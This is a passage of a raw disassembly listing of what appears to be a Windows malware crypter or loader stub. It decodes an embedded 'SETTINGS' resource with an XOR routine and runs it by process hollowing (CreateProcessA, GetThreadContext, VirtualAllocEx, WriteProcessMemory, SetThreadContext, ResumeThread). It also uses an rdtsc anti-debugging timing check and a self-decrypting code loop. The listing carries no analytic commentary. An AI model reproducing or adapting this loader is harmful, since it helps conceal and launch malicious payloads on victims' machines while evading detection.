retn
sub_10003450 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003494 proc near ; DATA XREF: CODE:100039E4�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100034B9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10005704
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100034C0
loc_100034B8: ; CODE XREF: sub_10003494+2A�j
retn
; ---------------------------------------------------------------------------
loc_100034B9: ; DATA XREF: sub_10003494+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100034B8
; ---------------------------------------------------------------------------
loc_100034C0: ; CODE XREF: sub_10003494:loc_100034B8�j
; DATA XREF: sub_10003494+1F�o
pop ebp
retn
sub_10003494 endp
; ---------------------------------------------------------------------------
align 4
loc_100034C4: ; DATA XREF: CODE:off_100039E0�o
sub ds:dword_10005704, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100034CC proc near ; DATA XREF: CODE:100039F4�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100034F1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_1000570C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100034F8
loc_100034F0: ; CODE XREF: sub_100034CC+2A�j
retn
; ---------------------------------------------------------------------------
loc_100034F1: ; DATA XREF: sub_100034CC+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100034F0
; ---------------------------------------------------------------------------
loc_100034F8: ; CODE XREF: sub_100034CC:loc_100034F0�j
; DATA XREF: sub_100034CC+1F�o
pop ebp
retn
sub_100034CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100034FC proc near ; DATA XREF: CODE:100039F0�o
sub ds:dword_1000570C, 1
retn
sub_100034FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003504 proc near ; CODE XREF: sub_10003710+18D�p
jmp ds:dword_10006128
sub_10003504 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000350C proc near ; CODE XREF: sub_10003A08+33�p
jmp ds:dword_10006124
sub_1000350C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003514 proc near ; CODE XREF: sub_10003A08+83�p
jmp ds:dword_10006120
sub_10003514 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000351C proc near ; CODE XREF: sub_10003710+1AA�p
jmp ds:dword_1000611C
sub_1000351C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003524 proc near ; CODE XREF: sub_10003A08+4F�p
jmp ds:dword_10006118
sub_10003524 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000352C proc near ; CODE XREF: sub_10003A08+57�p
jmp ds:dword_10006114
sub_1000352C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003534 proc near ; CODE XREF: sub_10003710+1C7�p
jmp ds:dword_10006110
sub_10003534 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000353C proc near ; CODE XREF: sub_10003710+252�p
jmp ds:dword_1000610C
sub_1000353C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003544 proc near ; CODE XREF: sub_10003710+246�p
jmp ds:dword_10006108
sub_10003544 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000354C proc near ; CODE XREF: sub_10003A08+41�p
jmp ds:dword_10006104
sub_1000354C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003554 proc near ; CODE XREF: sub_10003710+1E5�p
jmp ds:dword_10006100
sub_10003554 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000355C proc near ; CODE XREF: sub_10003710+204�p
; sub_10003710+224�p
jmp ds:dword_100060FC
sub_1000355C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003564 proc near ; CODE XREF: sub_10003710+9B�p
; sub_10003710+F3�p ...
xchg eax, edx
call sub_10002528
retn
sub_10003564 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000356C proc near ; CODE XREF: sub_10003710+143�p
; sub_10003710+153�p
xor ecx, ecx
call sub_1000270C
retn
sub_1000356C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003574 proc near ; DATA XREF: CODE:100039FC�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10003599
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10005710
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100035A0
loc_10003598: ; CODE XREF: sub_10003574+2A�j
retn
; ---------------------------------------------------------------------------
loc_10003599: ; DATA XREF: sub_10003574+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003598
; ---------------------------------------------------------------------------
loc_100035A0: ; CODE XREF: sub_10003574:loc_10003598�j
; DATA XREF: sub_10003574+1F�o
pop ebp
retn
sub_10003574 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100035A4 proc near ; DATA XREF: CODE:100039F8�o
sub ds:dword_10005710, 1
retn
sub_100035A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100035AC proc near ; CODE XREF: sub_10003A08+95�p
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100030BC
mov eax, [ebp+var_8]
call sub_100030BC
xor eax, eax
push ebp
push offset loc_10003663
push dword ptr fs:[eax]
mov fs:[eax], esp
mov esi, 1
mov eax, [ebp+var_4]
call sub_100030B4
mov edi, eax
test edi, edi
jle short loc_1000363D
mov ebx, 1
loc_100035F4: ; CODE XREF: sub_100035AC+8F�j
mov eax, [ebp+var_4]
mov al, [eax+ebx-1]
and al, 0Fh
mov edx, [ebp+var_8]
mov dl, [edx+esi-1]
and dl, 0Fh
xor al, dl
mov [ebp+var_D], al
lea eax, [ebp+var_4]
call sub_1000311C
mov edx, [ebp+var_4]
mov dl, [edx+ebx-1]
and dl, 0F0h
mov cl, [ebp+var_D]
add dl, cl
mov [eax+ebx-1], dl
inc esi
mov eax, [ebp+var_8]
call sub_100030B4
cmp esi, eax
jle short loc_10003639
mov esi, 1
loc_10003639: ; CODE XREF: sub_100035AC+86�j
inc ebx
dec edi
jnz short loc_100035F4
loc_1000363D: ; CODE XREF: sub_100035AC+41�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
call sub_10003014
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000366A
loc_10003655: ; CODE XREF: sub_100035AC+BC�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_10002FE4
retn
; ---------------------------------------------------------------------------
loc_10003663: ; DATA XREF: sub_100035AC+25�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003655
; ---------------------------------------------------------------------------
loc_1000366A: ; CODE XREF: sub_100035AC+B6�j
; DATA XREF: sub_100035AC+A4�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_100035AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003674 proc near ; CODE XREF: sub_10003710+AC�p
; sub_10003710+105�p ...
push ebx
mov ebx, edx
mov ecx, eax
mov eax, ecx
xor edx, edx
div ebx
test edx, edx
jnz short loc_10003687
mov eax, ecx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10003687: ; CODE XREF: sub_10003674+D�j
mov eax, ecx
xor edx, edx
div ebx
inc eax
imul ebx
pop ebx
retn
sub_10003674 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003694 proc near ; CODE XREF: sub_10003710+34�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ecx, [eax+3Ch]
add ecx, eax
mov edi, [ecx+38h]
mov ebx, [ecx+54h]
mov eax, ebx
xor edx, edx
div edi
test edx, edx
jnz short loc_100036B3
mov [esp+14h+var_14], ebx
jmp short loc_100036BF
; ---------------------------------------------------------------------------
loc_100036B3: ; CODE XREF: sub_10003694+18�j
mov eax, ebx
xor edx, edx
div edi
inc eax
imul edi
mov [esp+14h+var_14], eax
loc_100036BF: ; CODE XREF: sub_10003694+1D�j
lea esi, [ecx+18h]
movzx eax, word ptr [ecx+14h]
add esi, eax
movzx ebx, word ptr [ecx+6]
dec ebx
test ebx, ebx
jb short loc_10003707
inc ebx
xor ecx, ecx
loc_100036D4: ; CODE XREF: sub_10003694+71�j
lea eax, [ecx+ecx*4]
mov ebp, [esi+eax*8+8]
test ebp, ebp
jz short loc_10003703
lea eax, [ecx+ecx*4]
mov eax, ebp
xor edx, edx
div edi
test edx, edx
jnz short loc_100036F4
lea eax, [ecx+ecx*4]
add [esp+14h+var_14], ebp
jmp short loc_10003703
; ---------------------------------------------------------------------------
loc_100036F4: ; CODE XREF: sub_10003694+56�j
lea eax, [ecx+ecx*4]
mov eax, ebp
xor edx, edx
div edi
inc eax
imul edi
add [esp+14h+var_14], eax
loc_10003703: ; CODE XREF: sub_10003694+49�j
; sub_10003694+5E�j
inc ecx
dec ebx
jnz short loc_100036D4
loc_10003707: ; CODE XREF: sub_10003694+3B�j
mov eax, [esp+14h+var_14]
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10003694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003710 proc near ; CODE XREF: sub_10003A08+B1�p
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_E8 = dword ptr -0E8h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEC0h
push ebx
push esi
push edi
xor edx, edx
mov [ebp+var_140], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_1000399F
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
call sub_10003694
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
call sub_10002424
mov [ebp+var_1C], eax
xor edx, edx
push ebp
push offset loc_1000397F
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov eax, [eax+54h]
mov edx, [ebp+var_18]
lea esi, [edx+18h]
mov edx, [ebp+var_18]
movzx edx, word ptr [edx+14h]
add esi, edx
mov edx, [ebp+var_18]
movzx edi, word ptr [edx+6]
dec edi
test edi, edi
jb short loc_100037A3
inc edi
xor ebx, ebx
loc_1000378F: ; CODE XREF: sub_10003710+91�j
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+14h]
jbe short loc_1000379F
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+14h]
loc_1000379F: ; CODE XREF: sub_10003710+86�j
inc ebx
dec edi
jnz short loc_1000378F
loc_100037A3: ; CODE XREF: sub_10003710+7A�j
mov ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_14]
call sub_10003564
mov eax, [ebp+var_18]
mov edx, [eax+38h]
mov eax, [ebp+var_18]
mov eax, [eax+54h]
call sub_10003674
add eax, [ebp+var_14]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
movzx edi, word ptr [eax+6]
dec edi
test edi, edi
jb short loc_10003848
inc edi
xor ebx, ebx
loc_100037D6: ; CODE XREF: sub_10003710+136�j
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+10h]
test eax, eax
jbe short loc_10003822
lea edx, [ebx+ebx*4]
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+8]
jbe short loc_100037F4
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
loc_100037F4: ; CODE XREF: sub_10003710+DB�j
lea edx, [ebx+ebx*4]
mov edx, [esi+edx*8+14h]
add edx, [ebp+var_4]
mov ecx, eax
mov eax, [ebp+var_14]
call sub_10003564
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_18]
mov edx, [edx+38h]
call sub_10003674
add eax, [ebp+var_14]
mov [ebp+var_14], eax
jmp short loc_10003844
; ---------------------------------------------------------------------------
loc_10003822: ; CODE XREF: sub_10003710+CF�j
lea eax, [ebx+ebx*4]
cmp dword ptr [esi+eax*8+8], 0
jz short loc_10003844
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_18]
mov edx, [edx+38h]
call sub_10003674
add eax, [ebp+var_14]
mov [ebp+var_14], eax
loc_10003844: ; CODE XREF: sub_10003710+110�j
; sub_10003710+11A�j
inc ebx
dec edi
jnz short loc_100037D6
loc_10003848: ; CODE XREF: sub_10003710+C1�j
lea eax, [ebp+var_13C]
mov edx, 44h
call sub_1000356C
lea eax, [ebp+var_E8]
mov edx, 0CCh
call sub_1000356C
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_13C]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
lea edx, [ebp+var_140]
xor eax, eax
call sub_10002654
mov eax, [ebp+var_140]
call sub_100030CC
push eax
push 0
call sub_10003504 ; CreateProcessA
mov [ebp+var_E8], 10007h
lea eax, [ebp+var_E8]
push eax
mov eax, [ebp+var_F4]
push eax
call sub_1000351C ; GetThreadContext
lea eax, [ebp+var_C]
push eax
push 4
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_44]
add eax, 8
push eax
mov eax, [ebp+var_F8]
push eax
call sub_10003534 ; ReadProcessMemory
push 40h
push 3000h
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_F8]
push eax
call sub_10003554 ; VirtualAllocEx
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_18]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_F8]
push eax
call sub_1000355C ; WriteProcessMemory
lea eax, [ebp+var_C]
push eax
push 4
mov eax, [ebp+var_18]
add eax, 34h
push eax
mov eax, [ebp+var_44]
add eax, 8
push eax
mov eax, [ebp+var_F8]
push eax
call sub_1000355C ; WriteProcessMemory
mov eax, [ebp+var_18]
mov eax, [eax+34h]
mov edx, [ebp+var_18]
add eax, [edx+28h]
mov [ebp+var_38], eax
lea eax, [ebp+var_E8]
push eax
mov eax, [ebp+var_F4]
push eax
call sub_10003544 ; SetThreadContext
mov eax, [ebp+var_F4]
push eax
call sub_1000353C ; ResumeThread
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10003986
loc_10003974: ; CODE XREF: sub_10003710+274�j
mov eax, [ebp+var_1C]
push eax
call sub_100032AC
pop ecx
retn
; ---------------------------------------------------------------------------
loc_1000397F: ; DATA XREF: sub_10003710+4A�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003974
; ---------------------------------------------------------------------------
loc_10003986: ; CODE XREF: sub_10003710+26E�j
; DATA XREF: sub_10003710+25F�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100039A6
loc_10003993: ; CODE XREF: sub_10003710+294�j
lea eax, [ebp+var_140]
call sub_10002FC0
retn
; ---------------------------------------------------------------------------
loc_1000399F: ; DATA XREF: sub_10003710+1A�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003993
; ---------------------------------------------------------------------------
loc_100039A6: ; CODE XREF: sub_10003710+28E�j
; DATA XREF: sub_10003710+27E�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10003710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100039B0 proc near ; DATA XREF: CODE:10003A04�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100039CF
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100039D6
loc_100039CE: ; CODE XREF: sub_100039B0+24�j
retn
; ---------------------------------------------------------------------------
loc_100039CF: ; DATA XREF: sub_100039B0+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_100039CE
; ---------------------------------------------------------------------------
loc_100039D6: ; CODE XREF: sub_100039B0:loc_100039CE�j
; DATA XREF: sub_100039B0+19�o
pop ebp
retn
sub_100039B0 endp
; ---------------------------------------------------------------------------
dword_100039D8 dd 5 ; BSS:off_10005624�o
dd offset off_100039E0
off_100039E0 dd offset loc_100034C4 ; DATA XREF: CODE:100039DC�o
dd offset sub_10003494
dd offset sub_10003318
dd offset sub_100032C4
dd offset sub_100034FC
dd offset sub_100034CC
dd offset sub_100035A4
dd offset sub_10003574
dd 0
dd offset sub_100039B0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_10003A08 proc near ; CODE XREF: start-1B�p
var_14 = dword ptr -14h
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_14], eax
mov eax, offset dword_100039D8
call sub_10003450
xor eax, eax
push ebp
push offset loc_10003AD4
push dword ptr fs:[eax]
mov fs:[eax], esp
push 0Ah
push offset aSettings ; "SETTINGS"
mov eax, ds:dword_10005700
push eax
call sub_1000350C ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_10005700
push eax
call sub_1000354C ; SizeofResource
mov edi, eax
push ebx
mov eax, ds:dword_10005700
push eax
call sub_10003524 ; LoadResource
mov ebx, eax
push ebx
call sub_1000352C ; SetHandleCount
mov esi, eax
test esi, esi
jz short loc_10003A90
mov edx, edi
dec edx
mov eax, offset dword_10005714
call sub_10003124
mov eax, offset dword_10005714
call sub_1000311C
mov ecx, edi
mov edx, esi
call sub_10003564
push ebx
call sub_10003514 ; FreeResource
loc_10003A90: ; CODE XREF: sub_10003A08+60�j
lea ecx, [ebp+var_14]
mov edx, offset aXxxxxxxxxxxxxx ; "xxxxxxxxxxxxxxxxxx"
mov eax, ds:dword_10005714
call sub_100035AC
mov edx, [ebp+var_14]
mov eax, offset dword_10005714
call sub_10003014
mov eax, offset dword_10005714
call sub_1000311C
call sub_10003710
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10003ADB
loc_10003ACB: ; CODE XREF: sub_10003A08+D1�j
lea eax, [ebp+var_14]
call sub_10002FC0
retn
; ---------------------------------------------------------------------------
loc_10003AD4: ; DATA XREF: sub_10003A08+1B�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003ACB
; ---------------------------------------------------------------------------
loc_10003ADB: ; CODE XREF: sub_10003A08+CB�j
; DATA XREF: sub_10003A08+BE�o
pop edi
pop esi
pop ebx
call sub_10002ED0
sub_10003A08 endp
; ---------------------------------------------------------------------------
align 4
aSettings db 'SETTINGS',0 ; DATA XREF: sub_10003A08+28�o
align 10h
dd 0FFFFFFFFh, 12h
aXxxxxxxxxxxxxx db 'xxxxxxxxxxxxxxxxxx',0 ; DATA XREF: sub_10003A08+8B�o
align 4
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_10003B0E: ; CODE XREF: start+F�j
add ax, 5
add ax, 444h
sub ax, 43h
xor cl, cl
mov eax, offset sub_10001000
inc cl
loc_10003B23: ; CODE XREF: start-1D�j
xor [eax], cl
inc eax
cmp eax, 10003AE2h
jle short loc_10003B23
call sub_10003A08
; END OF FUNCTION CHUNK FOR start
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add ax, 44h
sub ax, 5
ror ax, 5
ror ax, 5
ror ax, 5
retn
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 10003B0E SIZE 00000024 BYTES
rdtsc
xor ecx, ecx
add ecx, eax
rdtsc
sub eax, ecx
cmp eax, 0FFFh
jb short loc_10003B0E
call nullsub_1
nop
retn
start endp
; ---------------------------------------------------------------------------
dd 6160h, 27h dup(0)
CODE ends
; Section 2. (virtual address 00004000)
; Virtual size : 0000009C ( 156.)
; Section size in file : 0000009C ( 156.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 10004000h
dword_10004000 dd 0 ; sub_10002E14+2�w ...
dword_10004004 dd 0 ; sub_10002DB8+37�r ...
byte_10004008 db 2 ; DATA XREF: sub_10003318+9�w
db 8Dh, 40h, 0
word_1000400C dw 1332h ; DATA XREF: sub_10002764+6�r
; sub_10002764:loc_100027DC�r ...
dw 0C08Bh
byte_10004010 db 0 ; DATA XREF: sub_10002840�r
; sub_1000285C�r ...
db 8Dh, 40h, 0
byte_10004014 db 0 ; DATA XREF: sub_10002CB8-336�r
; sub_10002CB8:loc_100029BD�r
db 8Dh, 40h, 0
byte_10004018 db 0 ; DATA XREF: sub_10002E44:loc_10002EA5�r
db 8Dh, 40h, 0
dword_1000401C dd 0 ; sub_1000322C+8�w ...
dword_10004020 dd 0 off_10004024 dd offset sub_10001E5C ; DATA XREF: sub_10002424+5�r
; sub_10002464+3F�r
off_10004028 dd offset sub_10001FEC ; DATA XREF: sub_10002444+5�r
; sub_10002464+26�r ...
off_1000402C dd offset sub_10002360 ; DATA XREF: sub_10002464+D�r
byte_10004030 db 0 ; DATA XREF: sub_100024C0+36�r
aRsu db 'ΛΜΘΙΧΟΘΝΞΫΨΚΩΪάέήίΰαγ',0
aFxn@ db 'δε@',0
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_10002DB8+3�o
; sub_10002E44+32�o ...
dw 0C08Bh
aError db 'Error',0 ; DATA XREF: sub_10002E44+6C�o
dw 0C08Bh
byte_10004074 db 30h ; DATA XREF: sub_10002DB8+41�r
a123456789abcde db '123456789ABCDEF',0 ; DATA XREF: sub_10003444�o
; sub_10003450+33�o ...
align 4
dword_10004088 dd 10000000h dword_1000408C dd 0 dword_10004090 dd 0 dd 2 dup(0)
DATA ends
; Section 3. (virtual address 00005000)
; Virtual size : 00000719 ( 1817.)
; Section size in file : 00000719 ( 1817.)
; Offset to raw data for section: 00005000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 10005000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_10005000 dd offset sub_100031C8 ; DATA XREF: sub_10003318+17�w
dword_10005004 dd 0 dword_10005008 dd 0 ; sub_100024C0+16�r
dword_1000500C dd 0 ; CODE:10002C28�r
off_10005010 dd offset sub_10001008 ; DATA XREF: sub_10002840+14�r
; sub_1000285C+16�r ...
off_10005014 dd offset sub_10001010 ; DATA XREF: sub_10002CB8-2B6�r
; CODE:10002C10�r ...
dword_10005018 dd 0 ; sub_10002ED0+B1�r
dword_1000501C dd 10000000h dword_10005020 dd 6C8h byte_10005024 db 0 ; DATA XREF: sub_10002D78+33�w
align 4
dword_10005028 dd 0Ah dword_1000502C dd 142340h dword_10005030 dd 0 byte_10005034 db 0 ; DATA XREF: sub_10002E44+1�r
byte_10005035 db 0 ; DATA XREF: sub_10001770+1B�r
; sub_10001770:loc_10001812�r ...
byte_10005036 db 2 ; DATA XREF: sub_10003318+10�w
align 4
dword_10005038 dd 0 ; sub_100032C4+19�o
word_1000503C dw 0D7B0h ; DATA XREF: sub_10003318+34�w
align 10h
dd 71h dup(0)
dword_10005204 dd 0 ; sub_100032C4+23�o
word_10005208 dw 0D7B0h ; DATA XREF: sub_10002E44+A�r
; sub_10003318+3D�w
align 10h
dword_10005210 dd 0 align 10h
dword_10005220 dd 0 dd 6Bh dup(0)
dword_100053D0 dd 0 word_100053D4 dw 0D7B0h ; DATA XREF: sub_10003318+46�w
align 4
dd 71h dup(0)
dword_1000559C dd 1 ; sub_10001D68+92�w ...
dword_100055A0 dd 4D00Ch ; sub_10001D68+9B�w ...
dword_100055A4 dd 0 ; sub_10003318�w
byte_100055A8 db 0 ; DATA XREF: sub_10001770+8E�w
; sub_10001770:loc_1000182D�r ...
align 4
dword_100055AC dd 0 ; sub_100014B0+63�w ...
dword_100055B0 dd 6 dup(0) ; sub_10001770+24�o ...
dword_100055C8 dd 0 ; sub_100010E4+2A�w ...
dword_100055CC dd 145CFCh ; sub_1000116C+A�r ...
off_100055D0 dd offset off_100055D0 ; DATA XREF: sub_10001288+3E�o
; sub_100012EC+51�o ...
dd offset off_100055D0
align 10h
off_100055E0 dd offset off_100055E0 ; DATA XREF: sub_10001530+B�o
; sub_100015C0+E�o ...
dd offset off_100055E0
align 10h
dword_100055F0 dd 90D010h dword_100055F4 dd 90D010h dd 0
dword_100055FC dd 90D010h ; sub_10001914+1�r ...
dword_10005600 dd 0 ; sub_10001C04+9�r ...
dword_10005604 dd 0 ; sub_10001C04+2E�r ...
dword_10005608 dd 0 ; sub_10001770+5D�r ...
off_1000560C dd offset off_1000560C ; DATA XREF: sub_10001770+42�o
; sub_10001834+81�o ...
dd offset off_1000560C
dd 2 dup(0)
dword_1000561C dd 0 ; sub_10002E14+D�o ...
dword_10005620 dd 12FFB0h ; sub_10002C90+2�r
off_10005624 dd offset dword_100039D8 ; DATA XREF: sub_10002D18+6�r
; sub_10002D78+14�w
dword_10005628 dd 0 ; sub_10002D78+1B�w
off_1000562C dd offset a123456789abcde+0Fh ; DATA XREF: sub_10002D78+20�w
dd 6 dup(0)
off_10005648 dd offset loc_10003190 ; DATA XREF: sub_100031A8�o
; sub_100031A8+19�w
dd 2Ah dup(offset sub_10003188)
byte_100056F4 db 0 ; DATA XREF: sub_10003404�r
align 4
TlsIndex dd 0 ; DATA XREF: sub_100033C0+C�r
; sub_100033C0+37�r ...
align 10h
dword_10005700 dd 10000000h ; sub_10003450+16�r ...
dword_10005704 dd 0 ; CODE:loc_100034C4�w
dword_10005708 dd 0 dword_1000570C dd 0 ; sub_100034FC�w
dword_10005710 dd 0 ; sub_100035A4�w
dword_10005714 dd 8C000Ch ; sub_10003A08+6F�o ...
db 0
BSS ends
; Section 4. (virtual address 00006000)
; Virtual size : 00000446 ( 1094.)
; Section size in file : 00000446 ( 1094.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 10006000h
dd 3 dup(0)
dd 6130h, 6078h, 3 dup(0)
dd 629Ch, 60C8h, 3 dup(0)
dd 62D4h, 60D8h, 3 dup(0)
dd 6314h, 60E8h, 3 dup(0)
dd 6360h, 60FCh, 5 dup(0)
dword_10006078 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_1000607C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_10006080 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_10006084 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_10006088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_1000608C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_10006090 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_10006094 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_10006098 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_1000609C dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_100060A0 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_100060A4 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_100060A8 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_100060AC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_100060B0 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_100060B4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_100060B8 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_100060BC dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_100060C0 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle align 8
dword_100060C8 dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_100060CC dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_100060D0 dd 7E42DF50h ; resolved to->USER32.CharNextA align 8
